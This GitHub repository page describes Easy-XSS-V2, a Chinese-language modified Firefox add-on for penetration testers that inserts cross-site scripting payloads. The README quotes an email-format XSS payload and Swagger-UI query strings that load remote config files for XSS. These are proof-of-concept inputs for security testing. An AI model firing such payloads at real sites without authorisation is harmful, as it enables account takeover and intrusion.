Skip to content

s7safe/Easy-XSS-V2

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
Easy XSS V2
Easy XSS V2
 
 
README.md
README.md
 
 

Repository files navigation

Easy-XSS-V2

在使用EasyXSS的时候发现,payloads太少,所以萌生出了添加payloads的想法 原版(https://addons.mozilla.org/zh-CN/firefox/addon/easy-xss/)

图片

以这个为原型找了下他的源代码,往上添加了一些自己常用的payloads

修改后 图片

不会太嘈杂,也好用一些

为了堵住嘴,我把修改后的代码放在了github上,可以看见很简单,也很好改动

如果你不信任我,那么请自己编译,然后自己添加到附件

zip -r ../XSS.xpi *

现在正在审核吧

图片

审核结束应该就可以从市场看见了

为了给朋友使用,所以我在火狐插件上传了它,当然你如果有一些常用的payloads可以分享给我,然后我添加,或者自己添加

写于2022年7月3日晚上,几分钟就改好了

payloads解释 ?configUrl=https://jumpy-floor.surge.sh/test.json ?url=https://jumpy-floor.surge.sh/test.yaml

这两个可能有的朋友没见过

请阅读这个文章 https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/#newsletter Swagger-UI XSS

图片

基于电子邮件的格式的payloads "><svg/onload=confirm(1)>"@x.y

剩下的应该可以看懂吧

About

Easy-XSS-V2 火狐XSS插件修改版

Topics

xss

Resources

Readme
Activity

Stars

17 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases 2

2.0 Latest
Oct 7, 2022
+ 1 release

Packages

No packages published

Languages